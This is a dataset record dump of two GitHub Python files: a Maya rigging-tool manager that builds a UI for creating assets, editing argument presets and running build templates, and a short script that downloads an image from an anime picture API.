Dataset schema (each record below supplies these fields in order, separated by | markers):
- blob_id: string (40 chars)
- directory_id: string (40 chars)
- path: string (3-281 chars)
- content_id: string (40 chars)
- detected_licenses: list (0-57 items)
- license_type: string (2 classes)
- repo_name: string (6-116 chars)
- snapshot_id: string (40 chars)
- revision_id: string (40 chars)
- branch_name: string (313 classes)
- visit_date: timestamp[us]
- revision_date: timestamp[us]
- committer_date: timestamp[us]
- github_id: int64 (18.2k-668M, nullable)
- star_events_count: int64 (0-102k)
- fork_events_count: int64 (0-38.2k)
- gha_license_id: string (17 classes)
- gha_event_created_at: timestamp[us]
- gha_created_at: timestamp[us]
- gha_language: string (107 classes)
- src_encoding: string (20 classes)
- language: string (1 class)
- is_vendor: bool
- is_generated: bool
- length_bytes: int64 (4-6.02M)
- extension: string (78 classes)
- content: string (2-6.02M chars)
- authors: list (1 item)
- author: string (0-175 chars)
649d3305c8a94ba9233b0341f2e5877d71f30475
|
79ea04b61afc43231dfdc76f290356af46598914
|
/FRW/manager.py
|
284daa87f29a5c755671f1ad31ca4ef1eac95ffb
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] |
permissive
|
PearseT/Maya_scripts
|
21b3abd78b7c132e5b28182f23d181050ec2b112
|
037fe39b1b4928dce6f967c710ecc0d1d087502d
|
refs/heads/master
| 2020-06-03T04:23:17.990529
| 2019-12-03T13:46:30
| 2019-12-03T13:46:30
| 191,436,434
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 26,731
|
py
|
# TODO:
# importDeformerWeights to perform auto-binding for some of the more common deformers like skinCluster, cluster, etc.
# quadruped
import sys, os, imp, inspect, shutil, glob, platform, __main__
from functools import partial
import maya.cmds as mc
THIS_DIR, THIS_FILE = os.path.split(__file__)
sys.path.append(THIS_DIR)
THIS_FILE_NAME = os.path.splitext(THIS_FILE)[0]
def __initialize():
    # LIB_CACHE must be declared global too; otherwise the assignment below creates a discarded local
    global STAGING_DIR, ASSET_TYPES, EDITOR, CACHE, LIB_CACHE
STAGING_DIR = ASSET_TYPES = EDITOR = None
CACHE = {}
LIB_CACHE = {}
def main(force=False):
if force:
if mc.dockControl("dc_FRW", ex=True) == True:
mc.deleteUI("dc_FRW")
if mc.window("w_FRW", ex=True):
mc.deleteUI("w_FRW")
if not mc.window("w_FRW", ex=True):
a = mc.window("w_FRW", t="the Fastest Rig in the West")
tl = mc.tabLayout()
tab1 = mc.paneLayout(cn="horizontal3", st=1, shp=1, ps=[(1,1,1),(2,1,99),(3,1,1)])
mc.columnLayout(adj=True)
mc.rowLayout(nc=5, adj=4)
mc.iconTextButton(st="iconOnly", i1="QR_add.png", ann="create new asset", c=__createAsset_ui)
mc.iconTextButton(st="iconOnly", i1="QR_delete.png", ann="delete selected asset", c=__deleteAsset)
mc.iconTextButton(st="iconOnly", i1="CN_refresh.png", ann="update assets list", c=__update)
mc.text(l="")
mc.iconTextButton(st="iconOnly", i1="UVEditorSnapshot.png", ann="update icon", c=__icon)
mc.setParent("..")
mc.rowLayout(nc=3, adj=2)
mc.textScrollList("tsl_type_FRW", w=100, h=200, sc=__updateNames)
mc.textScrollList("tsl_name_FRW", w=170, h=200, sc=__updateIconAndPath)
mc.image("img_FRW", w=200, h=200)
mc.setParent("..")
mc.rowLayout(nc=2, adj=1)
mc.textField("tf_path_FRW", ed=False)
mc.iconTextButton(st="iconOnly", i1="passSetRelationEditor.png", ann="edit", c=__edit)
mc.setParent("..")
mc.setParent("..")
mc.scrollLayout("sl_inspector_FRW", bv=True)
mc.setParent("..")
mc.button("b_execute_FRW", l="execute", c=__execute)
mc.setParent("..")
tab2 = mc.scrollLayout(bv=True)
mc.columnLayout("cl_library_FRW", adj=True, rs=5)
mc.setParent("..")
mc.setParent("..")
tab3 = mc.scrollLayout(bv=True)
mc.columnLayout("cl_extensions_FRW", adj=True, rs=5)
mc.setParent("..")
mc.setParent("..")
mc.tabLayout(tl, e=True, tl=[(tab1, "builder"), (tab2, "library"), (tab3, "extensions")])
if not mc.dockControl("dc_FRW", ex=True):
mc.dockControl("dc_FRW", l="the Fastest Rig in the West", con="w_FRW", aa=["left","right"], a="left", w=1)
mc.dockControl("dc_FRW", e=True, fl=True)
else:
mc.dockControl("dc_FRW", e=True, vis=True)
__initialize()
__update()
__library()
__extensions()
def __update(*arg):
__config()
si = None
if mc.textScrollList("tsl_type_FRW", q=True, nsi=True):
si = mc.textScrollList("tsl_type_FRW", q=True, si=True)[0]
mc.textScrollList("tsl_type_FRW", e=True, ra=True)
if os.path.isdir(STAGING_DIR):
for d in os.listdir(STAGING_DIR):
mc.textScrollList("tsl_type_FRW", e=True, a=d)
if d == si:
mc.textScrollList("tsl_type_FRW", e=True, si=d)
__updateNames()
def __config():
if not os.path.isfile(THIS_DIR+"/"+THIS_FILE_NAME+".cfg"): return
f = open(THIS_DIR+"/"+THIS_FILE_NAME+".cfg")
l = f.readlines()
f.close()
for line in l:
line = line.strip()
if "=" not in line: continue
line = line.split("=")
if len(line) != 2: continue
key = line[0].strip()
if key == "STAGING_DIR":
global STAGING_DIR
STAGING_DIR = THIS_DIR+"/staging/"
value = eval(line[1].strip())
if type(value) == str or type(value) == unicode:
if value[-1] != "/": value += "/"
STAGING_DIR = value
elif key == "ASSET_TYPES":
global ASSET_TYPES
ASSET_TYPES = eval(line[1].strip())
elif key == "EDITOR":
global EDITOR
EDITOR = line[1].strip()
def __updateNames():
si = None
if mc.textScrollList("tsl_name_FRW", q=True, nsi=True):
si = mc.textScrollList("tsl_name_FRW", q=True, si=True)[0]
mc.textScrollList("tsl_name_FRW", e=True, ra=True)
if mc.textScrollList("tsl_type_FRW", q=True, nsi=True):
t = mc.textScrollList("tsl_type_FRW", q=True, si=True)[0]
if os.path.isdir(STAGING_DIR):
for d in os.listdir(STAGING_DIR+"/"+t):
mc.textScrollList("tsl_name_FRW", e=True, a=d)
if d == si:
mc.textScrollList("tsl_name_FRW", e=True, si=d)
__updateIconAndPath()
def __updateIconAndPath():
mc.textField("tf_path_FRW", e=True, tx="")
mc.image("img_FRW", e=True, i=THIS_DIR+"/frw.png")
if mc.textScrollList("tsl_type_FRW", q=True, nsi=True):
t = mc.textScrollList("tsl_type_FRW", q=True, si=True)[0]
if mc.textScrollList("tsl_name_FRW", q=True, nsi=True):
n = mc.textScrollList("tsl_name_FRW", q=True, si=True)[0]
f = STAGING_DIR+"/"+t+"/"+n+"/"+n+".py"
if os.path.isfile(f):
mc.textField("tf_path_FRW", e=True, tx=f)
f = f[:-3]+".png"
if os.path.isfile(f):
mc.image("img_FRW", e=True, i=f)
__updateInspector()
# Updates the inspector according to the contents (functions and signatures) of the template script.
# Stores useful information in a global cache, accessible from everywhere in the code.
def __updateInspector():
global CACHE
CACHE = {"index":{}, "function":{}, "execute":{}}
mc.button("b_execute_FRW", e=True, en=False)
l = mc.scrollLayout("sl_inspector_FRW", q=True, ca=True) or []
if len(l): mc.deleteUI(l)
if mc.textScrollList("tsl_type_FRW", q=True, nsi=True):
t = mc.textScrollList("tsl_type_FRW", q=True, si=True)[0]
if mc.textScrollList("tsl_name_FRW", q=True, nsi=True):
CACHE["name"] = mc.textScrollList("tsl_name_FRW", q=True, si=True)[0]
CACHE["file"] = STAGING_DIR+t+"/"+CACHE["name"]+"/"+CACHE["name"]+".py"
if os.path.isfile(CACHE["file"]):
m = imp.load_source(CACHE["name"], CACHE["file"])
for n, o in inspect.getmembers(m, inspect.isfunction):
CACHE["index"][o.__code__.co_firstlineno] = [n, inspect.getargspec(o)]
ids = sorted(CACHE["index"].viewkeys()); c = len(ids)
for i in range(c):
if i == 0: mc.button("b_execute_FRW", e=True, en=True)
fn = CACHE["index"][ids[i]][0]
CACHE["function"][fn] = {"checkbox":None, "arguments":{}, "presets":{}}
mc.rowLayout(nc=10, adj=2, p="sl_inspector_FRW")
cb = mc.iconTextCheckBox(i="checkboxOff.png", si="checkboxOn.png",
v=__loadStatePreset(fn), cc=partial(__saveStatePreset, ids[i]))
CACHE["function"][fn]["checkbox"] = cb
mc.text(l=CACHE["index"][ids[i]][0], w=250, al="left", fn="fixedWidthFont")
ab = mc.iconTextButton(st="iconOnly", i1="fileOpen.png", ann="load preset", vis=False, c=partial(__loadAllArgPresets, ids[i]))
eb = mc.iconTextButton(st="iconOnly", i1="fileSave.png", ann="save preset", vis=False, c=partial(__saveAllArgPresets, ids[i]))
db = mc.iconTextButton(st="iconOnly", i1="QR_delete.png", ann="delete preset", vis=False, c=partial(__deleteAllArgPresets, ids[i]))
rv = mc.iconTextButton(st="iconOnly", i1="RS_disable.png", ann="reset value", vis=False, c=partial(__resetAllArgValues, ids[i]))
mc.text(l="", w=5)
CACHE["function"][fn]["error"] = mc.image(i="RS_WarningOldCollection", vis=False)
e = mc.iconTextButton(st="iconOnly", i1="timeplay.png", c=partial(__execute, ids[i]))
CACHE["execute"][e] = CACHE["index"][ids[i]][0]
mc.setParent("..")
arg_nms = CACHE["index"][ids[i]][1][0]; c_nms = len(arg_nms)
arg_val = CACHE["index"][ids[i]][1][3] or []; c_val = len(arg_val)
offset = c_nms - c_val
# arguments
for j in range(offset):
if j == 0:
for s in [ab, eb, db, rv]: mc.iconTextButton(s, e=True, vis=True)
tfg, img = __argumentWidget(j, ids[i], CACHE["index"][ids[i]][0], arg_nms[j], None)
CACHE["function"][fn]["arguments"][arg_nms[j]] = tfg
CACHE["function"][fn]["presets"][arg_nms[j]] = img
# keyword arguments
for j in range(c_val):
if j == 0:
for s in [ab, eb, db, rv]: mc.iconTextButton(s, e=True, vis=True)
jj = j+offset
tfg, img = __argumentWidget(jj, ids[i], CACHE["index"][ids[i]][0], arg_nms[jj], arg_val[j])
CACHE["function"][fn]["arguments"][arg_nms[jj]] = tfg
CACHE["function"][fn]["presets"][arg_nms[jj]] = img
if i < c-1: mc.separator(st="in", w=435, h=10, p="sl_inspector_FRW")
# Load at once any available presets for the arguments of the inspected function.
__loadArgPreset(ids[i], arg_nms)
def __argumentWidget(i, idx, fn, arg_nam, arg_val, presets=True):
mc.rowLayout(nc=2, adj=True)
tfg = mc.textFieldGrp(l=arg_nam, tx=str(arg_val))
if presets:
mc.popupMenu()
mc.menuItem("load preset", i="folder-open.png", c=partial(__loadArgPreset, idx, [arg_nam]))
mc.menuItem("save preset", i="UVTkSaveValue.png", c=partial(__saveArgPreset, idx, fn+"."+arg_nam))
mc.menuItem("delete preset", i="RS_delete.png", c=partial(__deleteArgPreset, idx, fn+"."+arg_nam))
mc.menuItem(d=True)
mc.menuItem("reset value", i="RS_disable.png", c=partial(__resetArgValue, idx, arg_nam))
img = mc.image(i="Bookmark.png", vis=False)
else: img = None
mc.setParent("..")
return tfg, img
def __icon(*arg):
if "file" not in CACHE.viewkeys(): return
mc.select(cl=True)
for e in mc.lsUI(ed=True):
try: mc.viewFit(p=e)
except: pass
f = CACHE["file"][:-3]+".png"
if os.path.isfile(f): os.remove(f)
fmt = mc.getAttr("defaultRenderGlobals.imageFormat")
mc.setAttr("defaultRenderGlobals.imageFormat", 32)
i = mc.playblast(cf=f, fmt="image", cc=False, fr=1, v=False, orn=False, os=True, p=100, wh=[200,200], qlt=100)
mc.setAttr("defaultRenderGlobals.imageFormat", fmt)
mc.image("img_FRW", e=True, i=f)
# edit build template
def __edit(*arg):
if "file" not in CACHE.viewkeys(): return
if not os.path.isfile(CACHE["file"]):
mc.confirmDialog(t=" ", m="File not found: "+CACHE["file"], b="ok")
return
if platform.system() == "Windows": os.system("start "+EDITOR+" "+CACHE["file"])
else: os.system(EDITOR+" "+CACHE["file"]+"&")
# edit library
def __edit2(*arg):
if not os.path.isfile(arg[0]):
mc.confirmDialog(t=" ", m="File not found: "+arg[0], b="ok")
return
if platform.system() == "Windows": os.system("start "+EDITOR+" "+arg[0])
else: os.system(EDITOR+" "+arg[0]+"&")
def __extensions():
l = mc.columnLayout("cl_extensions_FRW", q=True, ca=True) or []
if len(l) > 0: mc.deleteUI(l)
mc.columnLayout(p="cl_extensions_FRW")
mc.iconTextButton(st="iconOnly", i1="CN_refresh.png", ann="update", c=__extensions)
mc.setParent("..")
__main__.FRW_DIR = THIS_DIR
d = THIS_DIR+"/extensions/"
if not os.path.isdir(d): return
for f in glob.glob(d+"*.py"):
try:
n = os.path.splitext(os.path.split(f)[1])[0]
m = imp.load_source(n, f)
fl = mc.frameLayout(l=n, bv=True, cll=True, mw=5, mh=5, p="cl_extensions_FRW")
m.main()
mc.setParent("..")
mc.frameLayout(fl, e=True, cl=False)
mc.frameLayout(fl, e=True, cl=True)
except Exception as e:
print("Extension: "+f)
print(" Error: "+str(e))
def __library():
l = mc.columnLayout("cl_library_FRW", q=True, ca=True) or []
if len(l) > 0: mc.deleteUI(l)
mc.columnLayout(p="cl_library_FRW")
mc.iconTextButton(st="iconOnly", i1="CN_refresh.png", ann="update", c=__library)
mc.setParent("..")
if not os.path.isdir(THIS_DIR): return
global LIB_CACHE
LIB_CACHE = {}
for f in glob.glob(THIS_DIR+"/*.py"):
f = f.replace("\\", "/")
n = os.path.splitext(os.path.split(f)[1])[0]
try: m = imp.load_source(n, f)
except Exception as e:
print("Library: "+f)
print(" Error: "+str(e))
continue
fl = mc.frameLayout(l=n, bv=True, cll=True, cl=True, mw=15, mh=15, p="cl_library_FRW")
mc.rowLayout(nc=2, adj=1)
mc.textField(tx=f, ed=False)
mc.iconTextButton(st="iconOnly", i1="passSetRelationEditor.png", ann="edit", c=partial(__edit2, f))
mc.setParent("..")
mc.separator(st="in", w=420, h=10)
LIB_CACHE[f] = {}
for n, o in inspect.getmembers(m, inspect.isfunction):
LIB_CACHE[f][o.__code__.co_firstlineno] = [n, inspect.getargspec(o)]
ids = sorted(LIB_CACHE[f].viewkeys()); c = len(ids)
for i in range(c):
fn = LIB_CACHE[f][ids[i]][0]
arg_nms = LIB_CACHE[f][ids[i]][1][0]; c_nms = len(arg_nms)
arg_val = LIB_CACHE[f][ids[i]][1][3] or []; c_val = len(arg_val)
mc.frameLayout(l=fn, bv=True, cll=True, cl=True, mw=5, mh=5, fn="smallPlainLabelFont")
mc.rowLayout(nc=2, adj=1)
mc.text(l="")#fn, al="left", fn="fixedWidthFont")
e = mc.iconTextButton(st="iconOnly", i1="timeplay.png", c=partial(__execute2, f, ids[i]))
mc.setParent("..")
if c_nms > 0:
LIB_CACHE[f][ids[i]].append({})
offset = c_nms - c_val
# arguments
for j in range(offset):
LIB_CACHE[f][ids[i]][2][arg_nms[j]] = __argumentWidget(j, ids[i], LIB_CACHE[f][ids[i]][1][0], arg_nms[j], None, presets=False)[0]
# keyword arguments
for j in range(c_val):
jj = j+offset
LIB_CACHE[f][ids[i]][2][arg_nms[jj]] = __argumentWidget(jj, ids[i], LIB_CACHE[f][ids[i]][1][0], arg_nms[jj], arg_val[j], presets=False)[0]
# if i < c-1: mc.separator(st="in", h=10)
mc.setParent("..")
mc.frameLayout(fl, e=True, cl=False)
mc.frameLayout(fl, e=True, cl=True)
#
# argument presets
#
def __loadAllArgPresets(*arg):
if not os.path.isfile(CACHE["file"]):
mc.confirmDialog(t=" ", m="File not found: "+CACHE["file"], b="ok")
return
f = CACHE["file"][:-3]+".pre"
if os.path.isfile(f):
fn = CACHE["index"][arg[0]][0]
f = open(f); lines = f.readlines(); f.close()
for line in lines:
line = line.strip()
if "=" not in line: continue
l = line.split("=")
if not "." in l[0]: continue
fn2, arg2 = l[0].strip().split(".")
if fn != fn2: continue
for arg in CACHE["function"][fn]["arguments"].viewkeys():
if arg != arg2: continue
tfg = CACHE["function"][fn]["arguments"][arg]
mc.textFieldGrp(tfg, e=True, tx=l[1].strip())
img = CACHE["function"][fn]["presets"][arg]
mc.image(img, e=True, vis=True)
def __saveAllArgPresets(*arg):
if not os.path.isfile(CACHE["file"]):
mc.confirmDialog(t=" ", m="File not found: "+CACHE["file"], b="ok")
return
fn = CACHE["index"][arg[0]][0]
filepath = CACHE["file"][:-3]+".pre"
if os.path.isfile(filepath):
f = open(filepath); l = f.readlines(); f.close()
for arg in CACHE["function"][fn]["arguments"].viewkeys():
add = False
for i in range(len(l)):
s = l[i].strip()
if "=" not in s: continue
l2 = s.split("=")
if "." not in l2[0]: continue
if fn+"."+arg != l2[0].strip(): continue
add = True
tfg = CACHE["function"][fn]["arguments"][arg]
val = mc.textFieldGrp(tfg, q=True, tx=True)
l[i] = fn+"."+arg+" = "+str(val)+"\n"
img = CACHE["function"][fn]["presets"][arg]
mc.image(img, e=True, vis=True)
break
if not add:
tfg = CACHE["function"][fn]["arguments"][arg]
val = mc.textFieldGrp(tfg, q=True, tx=True)
l.append(fn+"."+arg+" = "+str(val)+"\n")
img = CACHE["function"][fn]["presets"][arg]
mc.image(img, e=True, vis=True)
else:
l = []
for arg in CACHE["function"][fn]["arguments"].viewkeys():
tfg = CACHE["function"][fn]["arguments"][arg]
val = mc.textFieldGrp(tfg, q=True, tx=True)
l.append(fn+"."+arg+" = "+str(val)+"\n")
img = CACHE["function"][fn]["presets"][arg]
mc.image(img, e=True, vis=True)
f = open(filepath, "w"); f.writelines(l); f.close()
def __deleteAllArgPresets(*arg):
if not os.path.isfile(CACHE["file"]):
mc.confirmDialog(t=" ", m="File not found: "+CACHE["file"], b="ok")
return
idx = arg[0]
fn = CACHE["index"][idx][0]
filepath = CACHE["file"][:-3]+".pre"
if os.path.isfile(filepath):
f = open(filepath); l = f.readlines(); f.close()
for arg in CACHE["function"][fn]["arguments"].viewkeys():
for i in range(len(l)):
s = l[i].strip()
if "=" not in s: continue
l2 = s.split("=")
if "." not in l2[0]: continue
if fn+"."+arg != l2[0].strip(): continue
__resetArgValue(idx, arg)
l.pop(i)
img = CACHE["function"][fn]["presets"][arg]
mc.image(img, e=True, vis=False)
break
f = open(filepath, "w"); f.writelines(l); f.close()
def __resetAllArgValues(*arg):
if not os.path.isfile(CACHE["file"]):
mc.confirmDialog(t=" ", m="File not found: "+CACHE["file"], b="ok")
return
for arg2 in CACHE["function"][CACHE["index"][arg[0]][0]]["arguments"].viewkeys():
__resetArgValue(arg[0], arg2)
def __loadStatePreset(*arg):
if not os.path.isfile(CACHE["file"]):
mc.confirmDialog(t=" ", m="File not found: "+CACHE["file"], b="ok")
return True
f = CACHE["file"][:-3]+".pre"
if os.path.isfile(f):
f = open(f); lines = f.readlines(); f.close()
for line in lines:
line = line.strip()
if "=" not in line: continue
l = line.split("=")
if "." in l[0]: continue
if arg[0] != l[0].strip(): continue
return eval(l[1])
return True
def __saveStatePreset(*arg):
if not os.path.isfile(CACHE["file"]):
mc.confirmDialog(t=" ", m="File not found: "+CACHE["file"], b="ok")
return
cb = CACHE["function"][CACHE["index"][arg[0]][0]]["checkbox"]
val = str(mc.iconTextCheckBox(cb, q=True, v=True))
fn = CACHE["index"][arg[0]][0]
filepath = CACHE["file"][:-3]+".pre"
if os.path.isfile(filepath):
add = False
f = open(filepath); l = f.readlines(); f.close()
for i in range(len(l)):
s = l[i].strip()
if "=" not in s: continue
l2 = s.split("=")
if "." in l2[0]: continue
if fn != l2[0].strip(): continue
add = True
l[i] = fn+" = "+val+"\n"
break
if not add: l.append(fn+" = "+val+"\n")
f = open(filepath, "w"); f.writelines(l); f.close()
else:
s = fn+" = "+val+"\n"
f = open(filepath, "w"); f.write(s); f.close()
def __loadArgPreset(*arg):
if not os.path.isfile(CACHE["file"]):
mc.confirmDialog(t=" ", m="File not found: "+CACHE["file"], b="ok")
return
f = CACHE["file"][:-3]+".pre"
if not os.path.isfile(f): lines = []
else:
f = open(f); lines = f.readlines(); f.close()
idx = arg[0]
fn = CACHE["index"][idx][0]
args = arg[1]
for arg in args:
img = CACHE["function"][CACHE["index"][idx][0]]["presets"][arg]
mc.image(img, e=True, vis=False)
for line in lines:
line = line.strip()
if "=" not in line: continue
l = line.split("=")
if "." not in l[0]: continue
fn2, arg2 = l[0].strip().split(".")
if fn != fn2 or arg != arg2: continue
tfg = CACHE["function"][CACHE["index"][idx][0]]["arguments"][arg]
mc.textFieldGrp(tfg, e=True, tx=("=".join(s for s in l[1:])).strip())
mc.image(img, e=True, vis=True)
def __saveArgPreset(*arg):
if not os.path.isfile(CACHE["file"]):
mc.confirmDialog(t=" ", m="File not found: "+CACHE["file"], b="ok")
return
idx = arg[0]
fn, arg = arg[1].split(".")
filepath = CACHE["file"][:-3]+".pre"
if os.path.isfile(filepath):
add = False
f = open(filepath); l = f.readlines(); f.close()
for i in range(len(l)):
s = l[i].strip()
if "=" not in s: continue
l2 = s.split("=")
if "." not in l2[0]: continue
if fn+"."+arg != l2[0].strip(): continue
add = True
tfg = CACHE["function"][CACHE["index"][idx][0]]["arguments"][arg]
val = mc.textFieldGrp(tfg, q=True, tx=True)
l[i] = fn+"."+arg+" = "+str(val)+"\n"
break
if not add:
tfg = CACHE["function"][CACHE["index"][idx][0]]["arguments"][arg]
val = mc.textFieldGrp(tfg, q=True, tx=True)
l.append(fn+"."+arg+" = "+str(val)+"\n")
f = open(filepath, "w"); f.writelines(l); f.close()
else:
tfg = CACHE["function"][CACHE["index"][idx][0]]["arguments"][arg]
val = mc.textFieldGrp(tfg, q=True, tx=True)
s = fn+"."+arg+" = "+str(val)+"\n"
f = open(filepath, "w"); f.write(s); f.close()
img = CACHE["function"][CACHE["index"][idx][0]]["presets"][arg]
mc.image(img, e=True, vis=True)
def __deleteArgPreset(*arg):
if not os.path.isfile(CACHE["file"]):
mc.confirmDialog(t=" ", m="File not found: "+CACHE["file"], b="ok")
return
idx = arg[0]
fn, arg = arg[1].split(".")
filepath = CACHE["file"][:-3]+".pre"
if os.path.isfile(filepath):
f = open(filepath); l = f.readlines(); f.close()
for i in range(len(l)):
s = l[i].strip()
if "=" not in s: continue
l2 = s.split("=")
if "." not in l2[0]: continue
if fn+"."+arg == l2[0].strip():
l.pop(i)
f = open(filepath, "w"); f.writelines(l); f.close()
__resetArgValue(idx, arg)
break
img = CACHE["function"][CACHE["index"][idx][0]]["presets"][arg]
mc.image(img, e=True, vis=False)
def __resetArgValue(*arg):
nms = CACHE["index"][arg[0]][1][0]; c_nms = len(nms)
val = CACHE["index"][arg[0]][1][3] or []; c_val = len(val)
offset = c_nms - c_val
for i in range(c_nms):
if arg[1] == nms[i]: break
tfg = CACHE["function"][CACHE["index"][arg[0]][0]]["arguments"][arg[1]]
if c_nms != c_val:
if i < offset: mc.textFieldGrp(tfg, e=True, tx="None")
else: mc.textFieldGrp(tfg, e=True, tx=str(val[i-offset]))
else: mc.textFieldGrp(tfg, e=True, tx=str(val[i]))
#
# execute code from inspector
#
def __execute(*arg):
if not os.path.isfile(CACHE["file"]):
mc.confirmDialog(t=" ", m="File not found: "+CACHE["file"], b="ok")
return
cmd = CACHE["name"]+'=imp.load_source("'+CACHE["name"]+'", "'+CACHE["file"]+'")'
print("import imp\n"+cmd); exec(cmd)
for idx in sorted(CACHE["index"].viewkeys()):
fn = CACHE["index"][idx][0]
mc.image(CACHE["function"][fn]["error"], e=True, vis=False)
if type(arg[0]) != int:
if not mc.iconTextCheckBox(CACHE["function"][fn]["checkbox"], q=True, v=True):
continue
elif idx != arg[0]:
continue
cmd = CACHE["name"]+"."+fn+"("+__arguments(idx)+")"
print(cmd)
try: exec(cmd)
except Exception as e:
mc.image(CACHE["function"][fn]["error"], e=True, vis=True)
raise Exception(e)
if type(arg[0]) == bool: __icon()
def __arguments(idx):
arg = ""
nms = CACHE["index"][idx][1][0]; cnt_nms = len(nms)
val = CACHE["index"][idx][1][3] or []; cnt_val = len(val)
off = cnt_nms-cnt_val
for i in range(off):
tfg = CACHE["function"][CACHE["index"][idx][0]]["arguments"][nms[i]]
val = mc.textFieldGrp(tfg, q=True, tx=True)
try: val = eval(val)
except: val = '"'+val+'"'
arg += str(val)
if cnt_nms != cnt_val: arg += ", "
for i in range(cnt_val):
tfg = CACHE["function"][CACHE["index"][idx][0]]["arguments"][nms[i+off]]
val = mc.textFieldGrp(tfg, q=True, tx=True)
try: val = eval(val)
except: val = '"'+val+'"'
arg += nms[i+off]+"="+str(val)
if i < cnt_val-1: arg += ", "
return arg
#
# execute code from library
#
def __execute2(*arg):
if not os.path.isfile(arg[0]):
mc.confirmDialog(t=" ", m="File not found: "+arg[0], b="ok")
return
n = os.path.split(os.path.splitext(arg[0])[0])[1]
cmd = n+'=imp.load_source("'+n+'", "'+arg[0]+'")'
print("import imp\n"+cmd); exec(cmd)
cmd = n+"."+LIB_CACHE[arg[0]][arg[1]][0]+"("+__arguments2(arg[0], arg[1])+")"
print(cmd); exec(cmd)
def __arguments2(f, idx):
arg = ""
nms = LIB_CACHE[f][idx][1][0]; cnt_nms = len(nms)
val = LIB_CACHE[f][idx][1][3] or []; cnt_val = len(val)
off = cnt_nms-cnt_val
for i in range(off):
tfg = LIB_CACHE[f][idx][2][nms[i]]
val = mc.textFieldGrp(tfg, q=True, tx=True)
try: val = eval(val)
except: val = '"'+val+'"'
arg += str(val)
if cnt_nms != cnt_val: arg += ", "
for i in range(cnt_val):
tfg = LIB_CACHE[f][idx][2][nms[i+off]]
val = mc.textFieldGrp(tfg, q=True, tx=True)
try: val = eval(val)
except: val = '"'+val+'"'
arg += nms[i+off]+"="+str(val)
if i < cnt_val-1: arg += ", "
return arg
#
# create/delete assets
#
def __createAsset_ui(*arg):
mc.layoutDialog(ui=__createAsset_dlg, t="create new asset")
def __createAsset_dlg():
mc.columnLayout(adj=True)
mc.rowLayout(nc=2, adj=2)
mc.text(l="rig type", al="right", w=80)
mc.optionMenu("om_rigType_FRW")
for f in glob.glob(THIS_DIR+"/*.ma"):
mc.menuItem(l=os.path.splitext(os.path.split(f)[1])[0])
mc.setParent("..")
mc.rowLayout(nc=2, adj=2)
mc.text(l="asset type", al="right", w=80)
mc.optionMenu("om_assetType_FRW")
for t in ASSET_TYPES: mc.menuItem(l=t)
mc.setParent("..")
mc.rowLayout(nc=2, adj=2)
mc.text(l="asset name", al="right", w=80)
mc.textField("tf_assetName_FRW")
mc.setParent("..")
mc.text(l="")
mc.rowColumnLayout(nc=2, cw=[(1,148),(2,148)])
mc.button(l="create", c=__createAsset_stage)
mc.button(l="cancel", c=__createAsset_cancel)
mc.setParent("..")
mc.setParent("..")
def __createAsset_cancel(*arg): mc.layoutDialog(dis="cancel")
def __createAsset_stage(*arg):
n = mc.textField("tf_assetName_FRW", q=True, tx=True).strip()
if not n:
mc.confirmDialog(t=" ", m="Incorrect asset name.", b="ok")
return
rt = mc.optionMenu("om_rigType_FRW", q=True, v=True)
at = mc.optionMenu("om_assetType_FRW", q=True, v=True)
f = STAGING_DIR+at+"/"+n+"/"+n+".py"
if os.path.isfile(f):
result = mc.confirmDialog(t="overwrite existing asset",
m="Asset with this name already exists. Do you want to overwrite it ?",
b=["yes","no"], cb="no", ds="no", db="no")
if result == "no": return
createAsset(rt, at, n)
mc.layoutDialog(dis="cancel")
__update()
mc.textScrollList("tsl_type_FRW", e=True, si=at)
__updateNames()
mc.textScrollList("tsl_name_FRW", e=True, si=n)
__update()
def createAsset(rigType, assetType, assetName):
directory = STAGING_DIR+assetType+"/"+assetName+"/"
try: os.makedirs(directory)
except: pass
if not os.path.isdir(directory):
raise Exception("Cannot create directory: "+directory)
filepath = directory+assetName+".py"
try: shutil.copy(THIS_DIR+"/template.py", filepath)
except: raise Exception("Cannot create file: "+filepath)
try: os.makedirs(directory+"/weights")
except: pass
try: os.remove(filepath[:-3]+".pre")
except: pass
if not os.path.isfile(THIS_DIR+"/"+rigType+".py"): rigType = "generic"
for f in glob.glob(THIS_DIR+"/"+rigType+".*"):
ext = os.path.splitext(f)[1]
if ext == ".py" or ext == ".pyc": continue
shutil.copy(f, directory+assetName+ext)
m = imp.load_source(rigType, THIS_DIR+"/"+rigType+".py")
for n, o in inspect.getmembers(m, inspect.isfunction):
if n == "main":
args = inspect.getargspec(o)
args1 = ", ".join((a+"="+str(b), a+'="'+str(b)+'"')[type(b) == str] for a,b in zip(args[0],args[3]))
args2 = ", ".join(a+"="+a for a in args[0])
f = open(filepath); s = f.read(); f.close()
s = s.replace("FRW_DIR", THIS_DIR).replace("FRW_RIG", rigType)
s = s.replace("FRW_ARG2", args2).replace("FRW_ARG", args1)
f = open(filepath, "w"); f.write(s); f.close()
break
print("Result: "+filepath)
return filepath
def __deleteAsset(*arg):
if "file" not in CACHE.viewkeys(): return
d = os.path.split(CACHE["file"])[0]
if not os.path.isdir(d):
mc.confirmDialog(t=" ", m="Invalid asset.", b="ok")
return
result = mc.confirmDialog(t="delete asset",
m="Do you want to delete the selected asset ?",
b=["yes","no"], cb="no", ds="no", db="no")
if result == "no": return
try: shutil.rmtree(d)
except: raise Exception("Cannot delete directory: "+d)
__update()
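# Usage sketch (editor's addition, not part of the original file; requires a
# running Maya session with this directory on sys.path):
#   import manager
#   manager.main(force=True)  # (re)build and dock "the Fastest Rig in the West"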
|
[
"pearsetoomey@gmail.com"
] |
pearsetoomey@gmail.com
|
0a884db25123476946a8d29963a9b291c969e426
|
aa89d7e6dfcf1da91fd5dfed6b966f342c24cc16
|
/p.py
|
b4757ebf5434fb383faf678e34598c858773c642
|
[] |
no_license
|
nanfeng-web/mine-pictures
|
6aad709904b07acd288603f793759b707e9f4b04
|
7a7cd2f3de63feacac7fd6824b9fc030eb8e23b3
|
refs/heads/main
| 2023-08-07T09:52:05.801232
| 2021-10-01T09:02:44
| 2021-10-01T09:02:44
| 399,729,566
| 1
| 0
| null | 2021-09-23T23:58:45
| 2021-08-25T07:29:52
| null |
UTF-8
|
Python
| false
| false
| 149
|
py
|
import requests
response = requests.get("https://api.nmb.show/1985acg.php")
file = open("paqu","wb")
file.write(response.content)
file.close()
|
[
"noreply@github.com"
] |
noreply@github.com
|
f9dd6d91e8aaee9919ed20cb74c14fc6f2d22c8b
|
